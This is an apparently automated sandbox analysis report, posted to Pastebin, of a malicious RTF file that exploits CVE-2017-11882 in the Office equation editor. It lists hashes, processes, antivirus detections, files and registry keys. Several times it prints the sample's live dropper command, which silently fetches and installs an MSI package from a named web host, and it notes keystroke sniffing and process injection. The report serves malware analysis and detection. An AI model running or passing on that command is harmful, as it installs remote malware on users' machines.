Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * ID: 1695
- * MalFamily: "CVE-2017-11882"
- * MalScore: 10.0
- * File Name: "RTF_7bf3ae38dce045ad13937af9758c92e6.doc"
- * File Size: 267473
- * File Type: "Rich Text Format data, version 1, unknown character set"
- * SHA256: "c21659b89b91c447b63993d2a169907afa432933ce32bb07357c86134de654b8"
- * MD5: "7bf3ae38dce045ad13937af9758c92e6"
- * SHA1: "8bf693003fd3e6d7aa487317fb3b7a6651197b1e"
- * SHA512: "c577be0ca5dd1ae3d2db89d728e7d2cb59f0df5bd35d8367a1b8e33e4994cd2c60e4528be9185b843b24dbbd2156c0317b30bfac88dd51dc3fa6207a03e8d2d4"
- * CRC32: "20EE51CA"
- * SSDEEP: "1536:sxxQW3ydnXEavohq0F3BYyEau8b56acpBb:sxt3NavohHCyAYu"
- * Process Execution:
- "WINWORD.EXE",
- "services.exe",
- "svchost.exe",
- "EQNEDT32.EXE",
- "cmd.exe",
- "msiexec.exe",
- "EQNEDT32.EXE",
- "msiexec.exe",
- "svchost.exe",
- "WerFault.exe",
- "WerFault.exe",
- "WerFault.exe",
- "WerFault.exe",
- "wermgr.exe",
- "OSPPSVC.EXE",
- "svchost.exe",
- "explorer.exe",
- "dwm.exe"
- * Executed Commands:
- "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding",
- "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet",
- "msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet",
- "C:\\Windows\\system32\\msiexec.exe /V",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "\"C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE\"",
- "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 2388 -s 412",
- "C:\\Windows\\system32\\WerFault.exe -u -p 2464 -s 568",
- "werfault.exe /h /shared Global\\3a008cb8a8a343b69cfbf1705af540a3",
- "C:\\Windows\\system32\\werfault.exe -pr Global\\9257F125FFD5B45B",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\""
- * Signatures Detected:
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "At least one process apparently crashed during execution",
- "Details":
- "Description": "Scheduled file move on reboot detected",
- "Details":
- "File Move on Reboot": "Old: C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer.tmp -> New: C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer"
- "Description": "Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution",
- "Details":
- "command": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet"
- "Description": "The RTF file contains embedded content",
- "Details":
- "embedded content": "Object 2 index 0000BF6Bh contains embedded object cT6VvSve.3 with size 3584 bytes"
- "Description": "NtCreateThreadEx: newly created thread hidden from debugger",
- "Details":
- "Description": "Anomalous file deletion behavior detected (10+)",
- "Details":
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp"
- "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\CVR9656.tmp.cvr"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref"
- "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref"
- "Description": "Expresses interest in specific running processes",
- "Details":
- "process": "OSPPSVC.EXE"
- "process": "WINWORD.EXE"
- "Description": "A HTTP/S link was seen in a script or command line",
- "Details":
- "command": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet"
- "Description": "The RTF file has an unknown character set",
- "Details":
- "Description": "Uses Windows utilities for basic functionality",
- "Details":
- "command": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet"
- "Description": "Sniffs keystrokes",
- "Details":
- "SetWindowsHookExW": "Process: explorer.exe(1960)"
- "Description": "Code injection with CreateRemoteThread in a remote process",
- "Details":
- "Injection": "WerFault.exe(2796) -> WINWORD.EXE(3068)"
- "Description": "Behavioural detection: Injection (inter-process)",
- "Details":
- "Description": "Behavioural detection: Injection with CreateRemoteThread in a remote process",
- "Details":
- "Description": "Behavioural detection: Transacted Hollowing",
- "Details":
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 1572664 times"
- "Description": "The EQNEDT32 equation process created a child process likely indicative of CVE-2017-11882 Office exploit",
- "Details":
- "created_process": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet "
- "Description": "Stack pivoting was detected when using a critical API",
- "Details":
- "process": "EQNEDT32.EXE:2388"
- "process": "msiexec.exe:2124"
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\~$vi7zfcZsR3.doc"
- "Description": "File has been identified by 31 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Exploit.RTF-ObfsStrm.Gen"
- "FireEye": "Exploit.RTF-ObfsStrm.Gen"
- "CAT-QuickHeal": "Exp.RTF.Obfus.Gen"
- "McAfee": "Exploit-CVE2017-11882.ah"
- "Arcabit": "Exploit.RTF-ObfsStrm.Gen"
- "Symantec": "Bloodhound.RTF.12"
- "ESET-NOD32": "probably a variant of Win32/Exploit.CVE-2017-11882.A"
- "TrendMicro-HouseCall": "Possible_SMBCVE20170199"
- "Kaspersky": "HEUR:Exploit.MSOffice.Generic"
- "BitDefender": "Exploit.RTF-ObfsStrm.Gen"
- "Ad-Aware": "Exploit.RTF-ObfsStrm.Gen"
- "Emsisoft": "Exploit.RTF-ObfsStrm.Gen (B)"
- "Comodo": "Exploit.W97M.CVE2017-11882.AG@843jmy"
- "F-Secure": "Heuristic.HEUR/Rtf.Malformed"
- "DrWeb": "Exploit.Rtf.CVE2012-0158"
- "TrendMicro": "Possible_SMBCVE20170199"
- "McAfee-GW-Edition": "Exploit-CVE2017-11882.ah"
- "Sophos": "Exp/201711882-P"
- "Cyren": "CVE-2017-11882!Camelot"
- "Avira": "HEUR/Rtf.Malformed"
- "MAX": "malware (ai score=83)"
- "Antiy-AVL": "TrojanExploit/OLE.CVE-2017-11882"
- "Microsoft": "Trojan:Script/Foretype.A!ml"
- "ZoneAlarm": "HEUR:Exploit.RTF.CVE-2017-11882.gen"
- "GData": "Exploit.RTF-ObfsStrm.Gen"
- "AhnLab-V3": "RTF/Malform-C.Gen"
- "TACHYON": "Trojan-Exploit/RTF.CVE-2017-11882"
- "Zoner": "Probably RTFObfuscation"
- "Rising": "Exploit.CVE-2017-11882/SLT!1.AEE3 (CLASSIC)"
- "Ikarus": "Exploit.CVE-2017-11882"
- "Qihoo-360": "susp.rtf.objupdate.gen"
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details":
- "Description": "The RTF file contains an object with potential exploit code",
- "Details":
- "cve": "Object 2 index 0000BF6Bh contains Microsoft Equation 3.0 (Known Related to CVE-2017-11882 or CVE-2018-0802)"
- * Started Service:
- "osppsvc",
- "msiserver",
- "WerSvc"
- * Mutexes:
- "Global\\MTX_MSO_Formal1_S-1-5-21-0000000000-0000000000-0000000000-1000",
- "Global\\MTX_MSO_AdHoc1_S-1-5-21-0000000000-0000000000-0000000000-1000",
- "5CAC3FAB-87F0-4750-984D-D50144543427-VER15",
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "Global\\_MSIExecute",
- "Local\\WERReportingForProcess2388",
- "Global\\ca344605-d57d-11e9-8070-18c086cd4729",
- "Local\\WERReportingForProcess2464",
- "Global\\\\xe5\\x88\\x90\\xc7\\x9a",
- "Local\\WERReportingForProcess3068",
- "Global\\e6da076c-d57d-11e9-8070-18c086cd4729",
- "Global\\\\xed\\xac\\xb0\\xcd\\x9e",
- "WERUI_APPCRASH-c6a08aebbdac3f74ea291cf85a7fb8436eb98a5"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\mnvi7zfcZsR3.doc",
- "C:\\Users\\user\\AppData\\Local\\Temp\\~$vi7zfcZsR3.doc",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRFFC3B42BF-0963-4DFD-8D4D-A3DC30366FA7.tmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS862D9AF4-6C86-4A2B-9EAC-76489E7C8F83.tmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS8526D782-2370-4052-99E7-C3D049572C10.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\CVR9656.tmp.cvr",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERB4EA.tmp.appcompat.txt",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERB5B6.tmp.WERInternalMetadata.xml",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERB615.tmp.hdmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERBE44.tmp.mdmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\Report.wer",
- "C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat",
- "\\??\\PIPE\\srvsvc",
- "\\Device\\LanmanDatagramReceiver",
- "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WER6E47.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WER727E.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WER731C.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WERA75C.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\CVR9656.tmp.cvr",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WERADB2.tmp.appcompat.txt",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WERD918.tmp.WERInternalMetadata.xml",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WER16CE.tmp.xml",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WER17B9.tmp.hdmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WER44B6.tmp.mdmp",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\Report.wer",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer.tmp"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\CVR9656.tmp.cvr",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp",
- "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer.tmp"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\/ys",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\Trusted Documents\\LastPurgeTime",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle\\ReviewToken",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\CA5C34",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\CA5C34\\CA5C34",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\OUTLOOKFiles",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingConfigurableSettings",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastSyncTime",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastWriteTime",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\General\\LastAutoSavePurgeTime",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\MTTF",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\MTTA",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109E60090400000000000F01FEC\\Usage\\EquationEditorFilesIntl_1033",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\Zoom",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\CustomZoom",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ShowAll",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\Version",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ForceOpen",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarDocked",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarShown",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarDockPos",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\MTUpgradeDialog",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Full",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Script",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\ScriptScript",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Symbol",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\SubSymbol",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LineSpacing",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MatrixRowSpacing",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MatrixColSpacing",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SuperscriptHeight",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SubscriptDepth",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimHeight",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimDepth",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimLineSpacing",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\NumerHeight",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\DenomDepth",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FractBarOver",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FractBarThick",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SubFractBarThick",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FenceOver",
